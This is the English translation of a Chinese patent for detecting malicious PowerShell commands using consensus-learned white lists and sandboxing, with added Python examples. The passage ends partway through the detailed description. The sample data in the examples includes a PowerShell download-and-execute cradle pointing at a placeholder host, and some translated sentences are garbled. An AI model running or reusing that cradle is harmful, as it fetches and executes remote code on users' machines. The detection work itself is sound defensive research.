Powershell malicious instruction detection method and system

Document number: 169022  Publication date: 2021-10-29  Views: 44  Language: Chinese

Reading note: This technique, "A powershell malicious instruction detection method and system" (一种powershell恶意指令检测方法及其系统), was designed and created by 毛菲 (Mao Fei), 刘隽良 (Liu Junliang), 柳遵梁 (Liu Zunliang) and 刘聪 (Liu Cong) on 2021-09-24. Its main content is as follows: the embodiment of the invention discloses a powershell malicious instruction detection method and system. The method comprises: acquiring a powershell calling mode set; matching the powershell calling mode set with a calling mode white list; collecting powershell basic information; generating a powershell basic behavior white list according to the powershell basic information; sending the white list to a host, and, when the host detects a newly added powershell instruction, the host acquiring the instruction information and matching it with the powershell basic behavior white list to obtain a pending instruction set; placing the pending instruction set in a server sandbox for execution to obtain an execution result; and processing the instruction according to the execution result. By implementing the method of the embodiment of the invention, variable powershell malicious instructions can be effectively identified.

1. A powershell malicious instruction detection method is characterized by comprising the following steps:

acquiring a powershell calling mode set;

matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set;

collecting powershell basic information;

performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning so as to generate a powershell basic behavior white list based on consensus;

sending the powershell basic behavior white list to a host, when the host detects that a new powershell instruction is added, acquiring new powershell instruction information by the host, and matching the new powershell instruction information with the powershell basic behavior white list to obtain an undetermined instruction set;

acquiring the set of pending instructions;

placing the set of pending instructions in a server sandbox for execution to obtain an execution result;

and blocking abnormal instructions and alarming related information according to the execution result, releasing non-abnormal instructions and executing the non-abnormal instructions.

2. The powershell malicious instruction detection method of claim 1, wherein the matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set comprises:

and screening elements in the powershell calling mode set, which are consistent with the powershell calling mode white list, so as to obtain a legal calling mode set.

3. The powershell malicious instruction detection method of claim 1, wherein the powershell basic information comprises powershell basic information of each host in the host group, and the powershell basic information of each host comprises a host code, an executed powershell function data set, a powershell function call chain set and an executed powershell command set.

4. The powershell malicious instruction detection method of claim 3, wherein the performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning to generate a consensus-based powershell basic behavior white list comprises:

performing consensus learning according to all executed powershell function data sets in the host group, and generating the complete, deduplicated powershell security function set of the host group to obtain a security function set;

performing consensus learning according to all executed powershell command sets in the host group, and generating the complete, deduplicated powershell security command set of the host group to obtain a security command set;

performing consensus learning according to all powershell function call chain sets in the host group, and generating the complete, deduplicated powershell security function call chain set of the host group to obtain a security function call chain set;

the powershell basic behavior white list comprises the security function set, the security command set and the security function call chain set.

5. The powershell malicious instruction detection method of claim 4, wherein the performing consensus learning according to all executed powershell function data sets in the host group and generating the complete, deduplicated powershell security function set of the host group to obtain a security function set comprises:

for each host in the host group, comparing the executed powershell function data set of that host with the executed powershell function data sets of the other hosts in the host group, and counting, for each powershell function in the executed powershell function data set of the current host, the number of times it appears in the executed powershell function data sets of the other hosts, so as to obtain a count set for each host;

screening out the powershell functions whose counts in the count set of each host exceed a set threshold value, to form the powershell security function set of each host;

integrating the powershell security function sets of all hosts to form the whole security function set;

and removing duplicate elements from the whole security function set to obtain the security function set.

6. The powershell malicious instruction detection method of claim 4, wherein the performing consensus learning according to all powershell function call chain sets in the host group and generating the complete, deduplicated powershell security function call chain set of the host group to obtain a security function call chain set comprises:

screening, in the powershell function call chain set of each host in the host group, the powershell function call chains that match the security function set, to obtain the security function call chain set of each host;

integrating the security function call chain sets of all hosts to form the whole security function call chain set;

and removing duplicate elements from the whole security function call chain set to obtain the security function call chain set.

7. The method as claimed in claim 1, wherein the sending of the powershell basic behavior white list to the host, when the host detects that a new powershell instruction is added, the acquiring of the new powershell instruction information by the host, and the matching of the new powershell instruction information with the powershell basic behavior white list to obtain the undetermined instruction set comprises:

sending the powershell basic behavior white list to a host;

when the host computer detects that a new powershell instruction is added, the host computer obtains information of the new powershell instruction;

the host screens out, from the newly added powershell instruction information, the instructions whose powershell function call chain belongs to the security function call chain set and whose powershell command belongs to the powershell commands corresponding to the elements of the security command set, to form security instructions, and releases the security instructions;

the host screens out, from the newly added powershell instruction information, the instructions whose powershell command does not belong to the powershell commands corresponding to the elements of the security command set, to form unsafe instructions, blocks the unsafe instructions and alarms the relevant information;

and the host screens out, from the newly added powershell instruction information, the instructions whose powershell function call chain does not belong to the security function call chain set but whose powershell command does belong to the powershell commands corresponding to the elements of the security command set, to form the undetermined instruction set.

8. The powershell malicious instruction detection method according to claim 1, wherein the blocking of abnormal instructions and alarming of related information according to the execution result, and the releasing and executing of non-abnormal instructions, comprises:

when the execution result indicates that the corresponding instruction is an abnormal instruction, sending a blocking notice for the abnormal instruction to the host of the corresponding instruction according to the execution result, and alarming the related information;

and when the execution result indicates that the corresponding instruction is a non-abnormal instruction, sending a release notice for the non-abnormal instruction to the host of the corresponding instruction according to the execution result, and allowing that host to execute the non-abnormal instruction.

9. A powershell malicious instruction detection system, comprising:

the first acquisition unit is used for acquiring a powershell calling mode set;

the first matching unit is used for matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set;

the acquisition unit is used for acquiring powershell basic information;

the consensus learning unit is used for performing powershell data analysis statistics according to the powershell basic information so as to perform consensus mechanism learning and generate a consensus-based powershell basic behavior white list;

the transmitting unit is used for transmitting the powershell basic behavior white list to a host, when the host detects a new powershell instruction, the host acquires new powershell instruction information and matches the new powershell instruction information with the powershell basic behavior white list to obtain an undetermined instruction set;

the second acquisition unit is used for acquiring the pending instruction set;

the execution unit is used for placing the set of the pending instructions in a server sandbox for execution to obtain an execution result;

and the processing unit is used for blocking the abnormal instruction and alarming related information according to the execution result, releasing the non-abnormal instruction and executing the non-abnormal instruction.

10. The powershell malicious instruction detection system according to claim 9, wherein the first matching unit is configured to screen the elements in the powershell calling mode set that are consistent with the powershell calling mode white list, so as to obtain a legal calling mode set.

Technical Field

The invention relates to computers, and in particular to a powershell malicious instruction detection method and a powershell malicious instruction detection system.

Background

powershell is a powerful command line tool developed by Microsoft with many uses and rich functionality; while it is convenient for users, it also opens a convenient door for malicious code authors. An attacker can use a powershell command to download malicious code to a user's system and run it, and can invoke powershell from the command line to load a section of encrypted data into memory for execution.

At present, traditional powershell malicious instruction identification is based only on known malicious commands or policies, so a large number of false positives and false negatives occur, and the approach lags in information updating and threat detection. Meanwhile, because the security judgment relies on a command blacklist, and a command blacklist is a curated set of known threats, conventional powershell security policy rules remain permanently in a state of hindsight: only after a problem has broken out on a large scale and the command characteristics have become known can the relevant security policy be updated to detect and alarm on it. Therefore, the current powershell instruction detection and identification methods cannot effectively identify variable powershell malicious instructions.

Therefore, a new method needs to be designed that can effectively identify diversified powershell malicious instructions.

Disclosure of Invention

The invention aims to overcome the defects of the prior art and provides a powershell malicious instruction detection method and a powershell malicious instruction detection system.

In order to achieve the purpose, the invention adopts the following technical scheme: a powershell malicious instruction detection method comprises the following steps:

acquiring a powershell calling mode set;

matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set;

collecting powershell basic information;

performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning so as to generate a powershell basic behavior white list based on consensus;

sending the powershell basic behavior white list to a host, when the host detects that a new powershell instruction is added, acquiring new powershell instruction information by the host, and matching the new powershell instruction information with the powershell basic behavior white list to obtain an undetermined instruction set;

acquiring the set of pending instructions;

placing the set of pending instructions in a server sandbox for execution to obtain an execution result;

and blocking abnormal instructions and alarming related information according to the execution result, releasing non-abnormal instructions and executing the non-abnormal instructions.

The further technical scheme is as follows: the step of matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set comprises the following steps:

and screening elements in the powershell calling mode set, which are consistent with the powershell calling mode white list, so as to obtain a legal calling mode set.

The further technical scheme is as follows: the powershell basic information comprises powershell basic information of each host in the host group, and the powershell basic information of each host comprises a host code, an executed powershell function data set, a powershell function call chain set and an executed powershell command set.

The further technical scheme is as follows: performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning so as to generate a consensus-based powershell basic behavior white list, including:

performing consensus learning according to all executed powershell function data sets in the host group, and generating the complete, deduplicated powershell security function set of the host group to obtain a security function set;

performing consensus learning according to all executed powershell command sets in the host group, and generating the complete, deduplicated powershell security command set of the host group to obtain a security command set;

performing consensus learning according to all powershell function call chain sets in the host group, and generating the complete, deduplicated powershell security function call chain set of the host group to obtain a security function call chain set;

the powershell basic behavior white list comprises the security function set, the security command set and the security function call chain set.

The further technical scheme is as follows: the performing of consensus learning according to all executed powershell function data sets in the host group and generating the complete, deduplicated powershell security function set of the host group to obtain a security function set comprises the following steps:

for each host in the host group, comparing the executed powershell function data set of that host with the executed powershell function data sets of the other hosts in the host group, and counting, for each powershell function in the executed powershell function data set of the current host, the number of times it appears in the executed powershell function data sets of the other hosts, so as to obtain a count set for each host;

screening out the powershell functions whose counts in the count set of each host exceed a set threshold value, to form the powershell security function set of each host;

integrating the powershell security function sets of all hosts to form the whole security function set;

and removing duplicate elements from the whole security function set to obtain the security function set.

The further technical scheme is as follows: the performing of consensus learning according to all powershell function call chain sets in the host group and generating the complete, deduplicated powershell security function call chain set of the host group to obtain a security function call chain set comprises the following steps:

screening, in the powershell function call chain set of each host in the host group, the powershell function call chains that match the security function set, to obtain the security function call chain set of each host;

integrating the security function call chain sets of all hosts to form the whole security function call chain set;

and removing duplicate elements from the whole security function call chain set to obtain the security function call chain set.
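The consensus learning described in the preceding steps (security function set, security command set and security function call chain set, i.e. claims 4 to 6) can be carried out with ordinary set arithmetic. The following Python program is an added example and is not code from the patent or its applicants. Its telemetry for a 4-host group, the cmdlet and command names in it, the record layout, the threshold MIN_OTHER_HOSTS, and the reading that a call chain "matches the security function set" when every function on it is a security function are all assumptions; the text only speaks of "a set threshold value" and of a host group of at least 10 hosts.

```python
"""Consensus learning of the powershell basic behavior white list.

Added example (not the patent's own code). Record layout, cmdlet names,
sample commands and the threshold MIN_OTHER_HOSTS are assumptions.
"""
from collections import Counter
from typing import Dict, Set, Tuple

CallChain = Tuple[str, ...]

# Assumed threshold: an element counted on MORE THAN this many other hosts
# is consensus behaviour. With 1, at least three hosts in total must have
# executed it.
MIN_OTHER_HOSTS = 1

# Constructed sample telemetry: host code -> executed function set,
# observed function call chains, executed command set. Each per-host set
# holds an element once, as an agent would report after deduplicating its log.
HOSTS: Dict[str, Dict[str, set]] = {
    "T1": {
        "functions": {"Get-Process", "Get-Service", "Invoke-WebRequest"},
        "call_chains": {("Get-Process",), ("Get-Service", "Get-Process"),
                        ("Invoke-WebRequest", "Get-Process")},
        "commands": {"Get-Process | Sort-Object CPU", "Get-Service -Name Spooler"},
    },
    "T2": {
        "functions": {"Get-Process", "Get-Service", "Set-ExecutionPolicy"},
        "call_chains": {("Get-Process",), ("Get-Service", "Get-Process"),
                        ("Set-ExecutionPolicy",)},
        "commands": {"Get-Process | Sort-Object CPU", "Get-Service -Name Spooler",
                     "Set-ExecutionPolicy Bypass"},
    },
    "T3": {
        "functions": {"Get-Process", "Get-Service", "Get-ChildItem"},
        "call_chains": {("Get-Process",), ("Get-ChildItem", "Get-Process")},
        "commands": {"Get-Process | Sort-Object CPU", "Get-Service -Name Spooler"},
    },
    "T4": {
        "functions": {"Get-Process", "Get-ChildItem", "Invoke-Expression"},
        "call_chains": {("Get-ChildItem", "Invoke-Expression"), ("Get-Process",)},
        "commands": {"Get-Process | Sort-Object CPU",
                     "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    },
}


def consensus_set(per_host: Dict[str, Set[str]], threshold: int = MIN_OTHER_HOSTS) -> Set[str]:
    """Claim 5, applied to any per-host set of strings (functions or commands).

    For each host x and each element e it reports, count how many OTHER hosts
    also report e; keep e for x when that count exceeds the threshold; then
    integrate the per-host results and deduplicate (a set union does both).
    """
    # Every per-host set lists an element at most once, so the count of e
    # across the other hosts equals (number of hosts reporting e) - 1.
    occurrences = Counter(e for elems in per_host.values() for e in elems)
    whole: Set[str] = set()
    for elems in per_host.values():
        whole |= {e for e in elems if occurrences[e] - 1 > threshold}
    return whole


def safe_call_chains(per_host_chains: Dict[str, Set[CallChain]],
                     safe_functions: Set[str]) -> Set[CallChain]:
    """Claim 6: a chain matches the security function set when every
    function on it is a security function (assumed reading of the text)."""
    whole: Set[CallChain] = set()
    for chains in per_host_chains.values():
        whole |= {c for c in chains if set(c) <= safe_functions}
    return whole


def build_whitelist(hosts: Dict[str, Dict[str, set]],
                    threshold: int = MIN_OTHER_HOSTS,
                    min_hosts: int = 2) -> Dict[str, set]:
    """Claim 4: the basic behavior white list is the triple of the three sets.

    min_hosts refuses to learn "consensus" from too few hosts; the patent's
    own minimum is T_min = 10, lowered here only to fit the 4-host sample.
    """
    if len(hosts) < min_hosts:
        raise ValueError(f"need at least {min_hosts} hosts, got {len(hosts)}")
    functions = consensus_set({h: d["functions"] for h, d in hosts.items()}, threshold)
    commands = consensus_set({h: d["commands"] for h, d in hosts.items()}, threshold)
    chains = safe_call_chains({h: d["call_chains"] for h, d in hosts.items()}, functions)
    return {"functions": functions, "commands": commands, "call_chains": chains}


if __name__ == "__main__":
    for name, members in build_whitelist(HOSTS).items():
        print(name, sorted(members))
```

With the sample data, Get-ChildItem is reported by only two hosts, so it fails the "more than one other host" test and stays out of the white list; Get-Process and Get-Service pass, and therefore only the chains built from those two cmdlets enter the security function call chain set. Because an element's count across the other hosts is the same no matter which host is "current", the per-host loop of claim 5 collapses to one global occurrence count; the loop is kept to mirror the claim.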

The further technical scheme is as follows: the sending of the powershell basic behavior white list to a host, when the host detects that a new powershell instruction is added, the host acquires new powershell instruction information and matches the new powershell instruction information with the powershell basic behavior white list to obtain an undetermined instruction set, and the method comprises the following steps:

sending the powershell basic behavior white list to a host;

when the host computer detects that a new powershell instruction is added, the host computer obtains information of the new powershell instruction;

the host screens out, from the newly added powershell instruction information, the instructions whose powershell function call chain belongs to the security function call chain set and whose powershell command belongs to the powershell commands corresponding to the elements of the security command set, to form security instructions, and releases the security instructions;

the host screens out, from the newly added powershell instruction information, the instructions whose powershell command does not belong to the powershell commands corresponding to the elements of the security command set, to form unsafe instructions, blocks the unsafe instructions and alarms the relevant information;

and the host screens out, from the newly added powershell instruction information, the instructions whose powershell function call chain does not belong to the security function call chain set but whose powershell command does belong to the powershell commands corresponding to the elements of the security command set, to form the undetermined instruction set.
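The three host-side screening rules above, together with the blocking or release notice the server later returns for a pending instruction, amount to a small state machine on the endpoint agent. The following Python program is an added example, not code from the patent; the white list contents, the instruction records, the buffer bookkeeping and the normalize() step (case-folding and whitespace collapsing before the command is matched, since powershell command names are case-insensitive) are assumptions, and the patent itself describes plain membership matching.

```python
"""Host-side triage of a newly added powershell instruction.

Added example (not the patent's own code). White list contents, sample
instructions, the normalize() step and the buffer layout are assumptions.
"""
from dataclasses import dataclass, field
from enum import Enum
from typing import Dict, List, Set, Tuple

CallChain = Tuple[str, ...]


class Verdict(Enum):
    RELEASE = "release"   # security instruction: executed at once
    BLOCK = "block"       # unsafe instruction: blocked and alarmed
    PENDING = "pending"   # held in the host buffer until the server sandbox decides


@dataclass(frozen=True)
class Instruction:
    command: str
    call_chain: CallChain


def normalize(command: str) -> str:
    """Case-fold and collapse whitespace before matching (an addition here:
    powershell names are case-insensitive, so 'get-process' must match)."""
    return " ".join(command.split()).casefold()


@dataclass
class Whitelist:
    """The parts of the basic behavior white list the host rules consult."""
    commands: Set[str]
    call_chains: Set[CallChain]

    def __post_init__(self) -> None:
        self.commands = {normalize(c) for c in self.commands}


def triage(instr: Instruction, wl: Whitelist) -> Verdict:
    """The three screening rules, applied in the order the text gives them."""
    command_safe = normalize(instr.command) in wl.commands
    chain_safe = instr.call_chain in wl.call_chains
    if not command_safe:      # command outside the security command set
        return Verdict.BLOCK
    if chain_safe:            # command and call chain both known-safe
        return Verdict.RELEASE
    return Verdict.PENDING    # safe command reached through an unknown chain


@dataclass
class HostAgent:
    host: str
    whitelist: Whitelist
    pending: Dict[int, Instruction] = field(default_factory=dict)  # host buffer
    executed: List[str] = field(default_factory=list)
    alarms: List[str] = field(default_factory=list)
    next_id: int = 0

    def on_new_instruction(self, instr: Instruction) -> Verdict:
        verdict = triage(instr, self.whitelist)
        if verdict is Verdict.RELEASE:
            self.executed.append(instr.command)
        elif verdict is Verdict.BLOCK:
            self.alarms.append(f"{self.host}: blocked {instr.command!r} "
                               f"(chain {' -> '.join(instr.call_chain)})")
        else:
            self.pending[self.next_id] = instr
            self.next_id += 1
        return verdict

    def on_server_verdict(self, pending_id: int, abnormal: bool) -> None:
        """Blocking or release notice derived from the server sandbox result."""
        instr = self.pending.pop(pending_id)
        if abnormal:
            self.alarms.append(f"{self.host}: sandbox judged {instr.command!r} abnormal")
        else:
            self.executed.append(instr.command)


# Constructed sample white list and instructions.
SAMPLE_WHITELIST = Whitelist(
    commands={"Get-Process | Sort-Object CPU", "Get-Service -Name Spooler"},
    call_chains={("Get-Process",), ("Get-Service", "Get-Process")},
)
SAMPLE_INSTRUCTIONS = [
    Instruction("Get-Process | Sort-Object CPU", ("Get-Process",)),              # release
    Instruction("get-service  -Name Spooler", ("Get-Service", "Stop-Service")),  # pending
    Instruction("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')",
                ("Invoke-Expression",)),                                         # block
]


def run_demo() -> HostAgent:
    agent = HostAgent("T1", SAMPLE_WHITELIST)
    for instr in SAMPLE_INSTRUCTIONS:
        agent.on_new_instruction(instr)
    # Constructed sandbox result: the pending instruction was judged non-abnormal.
    for pending_id in list(agent.pending):
        agent.on_server_verdict(pending_id, abnormal=False)
    return agent


if __name__ == "__main__":
    demo = run_demo()
    print("executed:", demo.executed)
    print("alarms:", demo.alarms)
```

Note the asymmetry the rules impose: an unknown command is blocked on the host without ever reaching the sandbox, while a known command arriving through an unknown call chain is only deferred. Exact string matching on the command text is therefore the weakest link of the host-side step, which is why the example folds case and whitespace before comparing; any richer obfuscation still lands on the "unknown command" branch and is blocked.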

The further technical scheme is as follows: the blocking of abnormal instructions and alarming of related information according to the execution result, and the releasing and executing of non-abnormal instructions, comprises:

when the execution result indicates that the corresponding instruction is an abnormal instruction, sending a blocking notice for the abnormal instruction to the host of the corresponding instruction according to the execution result, and alarming the related information;

and when the execution result indicates that the corresponding instruction is a non-abnormal instruction, sending a release notice for the non-abnormal instruction to the host of the corresponding instruction according to the execution result, and allowing that host to execute the non-abnormal instruction.

The invention also provides a powershell malicious instruction detection system, which comprises:

the first acquisition unit is used for acquiring a powershell calling mode set;

the first matching unit is used for matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set;

the acquisition unit is used for acquiring powershell basic information;

the consensus learning unit is used for performing powershell data analysis statistics according to the powershell basic information so as to perform consensus mechanism learning and generate a consensus-based powershell basic behavior white list;

the transmitting unit is used for transmitting the powershell basic behavior white list to a host, when the host detects a new powershell instruction, the host acquires new powershell instruction information and matches the new powershell instruction information with the powershell basic behavior white list to obtain an undetermined instruction set;

the second acquisition unit is used for acquiring the pending instruction set;

the execution unit is used for placing the set of the pending instructions in a server sandbox for execution to obtain an execution result;

and the processing unit is used for blocking the abnormal instruction and alarming related information according to the execution result, releasing the non-abnormal instruction and executing the non-abnormal instruction.

The further technical scheme is as follows: the first matching unit is configured to screen the elements in the powershell calling mode set that are consistent with the powershell calling mode white list, so as to obtain a legal calling mode set.

Compared with the prior art, the invention has the following beneficial effects. The powershell calling mode is detected and matched against the calling mode white list. When a powershell script or command is about to execute, it is matched against the powershell basic behavior white list, and the powershell behavior that matches successfully is released. Powershell behavior that does not match is held in a buffer area on the endpoint host, and the script or command is executed and inspected in a server sandbox; only after the abnormal-behavior judgment is the script or command released from the host buffer. The powershell basic behavior white list itself is generated by periodically collecting information on executed scripts and commands and performing consensus mechanism learning on it. In this way accurate powershell malicious instruction detection is achieved, and variable powershell malicious instructions can be effectively identified.

The invention is further described below with reference to the accompanying drawings and specific embodiments.

Drawings

In order to more clearly illustrate the technical solutions of the embodiments of the present invention, the drawings needed to be used in the description of the embodiments are briefly introduced below, and it is obvious that the drawings in the following description are some embodiments of the present invention, and it is obvious for those skilled in the art to obtain other drawings based on these drawings without creative efforts.

Fig. 1 is a schematic view of an application scenario of a powershell malicious instruction detection method according to an embodiment of the present invention;

fig. 2 is a schematic flowchart of a method for detecting a malicious instruction in powershell according to an embodiment of the present invention;

fig. 3 is a sub-flow diagram of a powershell malicious instruction detection method according to an embodiment of the present invention;

fig. 4 is a sub-flow diagram of a powershell malicious instruction detection method according to an embodiment of the present invention;

fig. 5 is a sub-flow diagram of a powershell malicious instruction detection method according to an embodiment of the present invention;

fig. 6 is a schematic block diagram of a powershell malicious instruction detection system according to an embodiment of the present invention;

fig. 7 is a schematic block diagram of a consensus learning unit of a powershell malicious instruction detection system according to an embodiment of the present invention;

fig. 8 is a schematic block diagram of a security function set determination subunit of a powershell malicious instruction detection system according to an embodiment of the present invention;

fig. 9 is a schematic block diagram of a secure function call chain set determination subunit of the powershell malicious instruction detection system according to the embodiment of the present invention;

FIG. 10 is a schematic block diagram of a computer device provided by an embodiment of the present invention.

Detailed Description

The technical solutions in the embodiments of the present invention will be clearly and completely described below with reference to the drawings in the embodiments of the present invention, and it is obvious that the described embodiments are some, not all, embodiments of the present invention. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present invention.

It will be understood that the terms "comprises" and/or "comprising," when used in this specification and the appended claims, specify the presence of stated features, integers, steps, operations, elements, and/or components, but do not preclude the presence or addition of one or more other features, integers, steps, operations, elements, components, and/or groups thereof.

It is also to be understood that the terminology used in the description of the invention herein is for the purpose of describing particular embodiments only and is not intended to be limiting of the invention. As used in the specification of the present invention and the appended claims, the singular forms "a," "an," and "the" are intended to include the plural forms as well, unless the context clearly indicates otherwise.

It should be further understood that the term "and/or" as used in this specification and the appended claims refers to and includes any and all possible combinations of one or more of the associated listed items.

Referring to fig. 1 and fig. 2, fig. 1 is a schematic view of an application scenario of a powershell malicious instruction detection method according to an embodiment of the present invention, and fig. 2 is a schematic flow chart of the method. The powershell malicious instruction detection method is applied to a server. The server exchanges data with the hosts of multiple endpoints: it obtains the powershell calling mode set of each host, collects powershell basic information, generates a powershell basic behavior white list and sends the white list to the hosts so that each host can check its own new powershell instructions; the server then places the undetermined instructions in a server sandbox for execution, blocks and alarms the abnormal instructions, and releases the non-abnormal instructions for execution.

Fig. 2 is a schematic flowchart of a powershell malicious instruction detection method according to an embodiment of the present invention. As shown in fig. 2, the method includes the following steps S110 to S180.

And S110, acquiring a powershell calling mode set.

In this embodiment, the method is implemented by installing agent software on each host. The agent software detects the powershell calling modes on the endpoint host in real time and obtains the endpoint host code T_x and the host's powershell calling mode set TW_x.

In one embodiment, the host group T comprises 10 hosts, i.e. T = {T_1, T_2, ..., T_10}. Specifically, agent software is installed on each host of the endpoint host group T = {T_1, T_2, ..., T_10}; it detects the powershell calling modes on the endpoint host in real time and acquires the endpoint host code T_x and the host's powershell calling mode set TW_x. In this embodiment, endpoint host T_1 is detected to call powershell in two different ways at one time, so the collected data are: host T_1: TW_1 = {S_1W_1, S_2W_1}.

The powershell calling modes comprise: GUI calls, cmd calls, calls through the command execution interface of a web or business system, database calls, webshell calls, Cobalt Strike calls, and the like. A powershell calling mode white list P_all = {P_1, P_2, ..., P_n} is established according to these calling modes, where P_1, P_2, ..., P_n are powershell calling modes.

And S120, matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set.

In this embodiment, the legal calling mode set refers to a set formed by elements in the powershell calling mode set, which are consistent with a powershell calling mode white list.

Specifically, screening elements in the powershell calling mode set, which are consistent with the powershell calling mode white list, to obtain a legal calling mode set.

Specifically, an anomaly comparison algorithm F_1 decides as follows. For the endpoint host group T = {T_1, T_2, ..., T_n}, where T_1, T_2, ..., T_n are the host codes, acquire the powershell calling mode set of each host, {TW_1, TW_2, ..., TW_n}, and compute the match between each host's powershell calling modes and the powershell calling mode white list P_all. Let the current endpoint host be T_x with powershell calling mode set TW_x; for each calling mode S_yW_x in TW_x, check whether it matches the white list P_all by computing F_1(S_yW_x, P_all):

when S_yW_x ∈ P_all, F_1(S_yW_x, P_all) = 0, the powershell calling mode S_yW_x of the endpoint host is considered legal, and powershell can be called normally; when S_yW_x ∉ P_all, F_1(S_yW_x, P_all) = 1, the powershell calling mode S_yW_x of the endpoint host is considered illegal, the powershell call fails, and the relevant information is alarmed.

S130, collecting powershell basic information.

In this embodiment, the powershell basic information includes powershell basic information of each host in the host group, and the powershell basic information of each host includes a host code, an executed powershell function data set, a powershell function call chain set, and an executed powershell command set.

The method is realized by installing agent software on each host, the host data acquisition interval H can be set by a user in a user-defined mode, and the default acquisition interval H =24 hours. The minimum value Tmin =10 of the data source of the basic information of the obtained endpoint host powershell, namely the participating host group T, is not limited. In this example, the user does not define the collection interval H, i.e., H is a default interval of 24 hours, i.e., the powershell basic information collection is performed every 24 hours.

Assume host group { T1,T2,……,T1050 powershell instructions are executed in each instruction, and the powershell basic information received by the server is as follows:

Set of powershell functions executed: {T_M1, T_M2, T_M3, ……, T_M10};

Powershell function call chain set: {T_S1, T_S2, T_S3, ……, T_S10};

Powershell command data set executed: {T_G1, T_G2, T_G3, ……, T_G10}.

And S140, performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning so as to generate a powershell basic behavior white list based on consensus.

In this embodiment, the powershell basic behavior white list includes a security function set, a security command set, and a security function call chain set.

In an embodiment, referring to fig. 3, the step S140 may include steps S141 to S143.

S141, performing consensus learning according to all executed powershell function data sets in the host group, and generating a unique powershell safety function set of the host group to obtain a safety function set.

In this embodiment, the security function set refers to the set of powershell functions whose number of occurrences in the powershell function data sets executed by the other hosts exceeds a set threshold.

In one embodiment, referring to FIG. 4, the step S141 includes steps S1411 to S1414.

S1411, for each host in the host group, comparing the powershell function data set executed by that host with the powershell function data sets executed by the other hosts in the host group, and counting the number of times each powershell function in the powershell function data set executed by the current host appears in the powershell function data sets executed by the other hosts, to obtain a times statistic set for each host.

In this embodiment, the times statistic set of a host refers to the set formed by the number of times each powershell function in the powershell function data set executed by that host appears in the powershell function data sets executed by the other hosts.

In particular, there is an algorithm F2, which compares the powershell functions executed by all hosts acquired from the host group T and judges whether unknown abnormal functions exist.

Algorithm F2 decides as follows. For the host group T{T_1, T_2, ……, T_n}, where T_1, T_2, ……, T_n are the host codes, acquire the set of powershell functions executed by each host {T_M1, T_M2, ……, T_Mn} and calculate how the powershell functions executed by each host match those executed by the other endpoint hosts in the group. Let the current host be T_x and the powershell function set it executed be T_Mx; then T_Mx is compared with T_except(Mx), the set of all powershell functions executed by the endpoint hosts of {T_M1, T_M2, ……, T_Mn} other than T_Mx, calculating F2(T_Mx, T_except(Mx)): for each powershell function L_yMx in T_Mx, count its number of occurrences S_y in T_except(Mx), and generate the occurrence statistics set S_Mx{S_1, S_2, S_3, ……, S_n} of the powershell functions L_yMx of T_Mx in T_except(Mx).

In this embodiment, take L_1M1 as an example: count the occurrences of L_1M1 in the powershell function sets executed by the other hosts, T_except(M1){T_M2, T_M3, T_M4, ……, T_M10}, to obtain S_1. Take L_2M1 as an example: count the occurrences of L_2M1 in T_except(M1){T_M2, T_M3, T_M4, ……, T_M10} to obtain S_2. And so on, finally generating the occurrence statistics set S_M1{S_1, S_2, S_3, ……, S_50} of each powershell function L_yM1 of T_M1 in T_except(M1).

And S1412, screening out powershell functions corresponding to elements exceeding a set frequency threshold in the frequency statistic set of each host to form a powershell safety function set of each host.

In this embodiment, the powershell security function set of each host is a set formed by powershell functions corresponding to elements exceeding a set frequency threshold in the frequency statistic set of each host.

In particular, there is a consensus comparison algorithm F3, F3{(S_y, N)}, where N is a specified threshold that defaults to a certain value and can be set manually. Algorithm F3 compares each element S_y of the occurrence statistics set S_Mx{S_1, S_2, S_3, ……, S_n} with N: when S_y ≥ N, F3{(S_y, N)} = 0, the powershell function is judged to conform to the consensus mechanism, the corresponding powershell function is safe, and the powershell function L_yMx corresponding to S_y is put into the powershell security function set W_Mx of host T_x; when S_y < N, F3{(S_y, N)} = 1, the function is considered not to meet the consensus mechanism judgment, and exception handling is performed.

In this example, the default threshold requires a powershell function to have been executed on at least 60% of the total number of hosts, so the default value of N is 6; it can also be adjusted according to the actual situation.

Algorithm F3 compares each element S_y of the occurrence statistics set S_M1{S_1, S_2, S_3, ……, S_50} with 6. In this example, S_1 ≥ 6, so F3{(S_y, N)} = 0: the powershell function is judged to conform to the consensus mechanism, the corresponding powershell function is safe, and the powershell function L_1M1 corresponding to S_1 is put into the powershell security function set W_M1 of host T_1; S_2 < 6, so F3{(S_y, N)} = 1: the powershell function L_2M1 corresponding to S_2 is considered not to meet the consensus mechanism, and exception handling is performed. By analogy, each element S_y of the occurrence statistics set S_M1{S_1, S_2, S_3, ……, S_50} is compared with 6 one by one. In this example, the values of S_2, S_6, S_10, S_13, S_20, S_23, S_39 and S_40 are less than 6, so the corresponding powershell functions L_2M1, L_6M1, L_10M1, L_13M1, L_20M1, L_23M1, L_39M1 and L_40M1 do not satisfy the consensus learning mechanism, and the remaining 42 powershell functions are put into the powershell security function set W_M1 of host T_1.

And S1413, integrating the powershell security function set of each host to form a whole security function set.

In this embodiment, the entire set of security functions refers to the powershell security function set of all hosts.

And S1414, performing element duplication removal on all the security function sets to obtain a security function set.

In this embodiment, the consensus mechanism judgment is made one by one on the powershell function data executed in the whole host group, generating the set of all powershell security function sets {W_M1, W_M2, W_M3, ……, W_M10} of the host group T{T_1, T_2, ……, T_10}. The elements of {W_M1, W_M2, W_M3, ……, W_M10} are deduplicated, finally generating the complete and unique powershell security function set W_all of the host group T{T_1, T_2, ……, T_10}.

And S142, performing consensus learning according to all executed powershell command sets in the host group, and generating all and only powershell safety command sets of the host group to obtain a safety command set.

In this embodiment, the security command set refers to the set of powershell commands whose number of occurrences in the executed powershell command sets of the other hosts exceeds a set threshold.

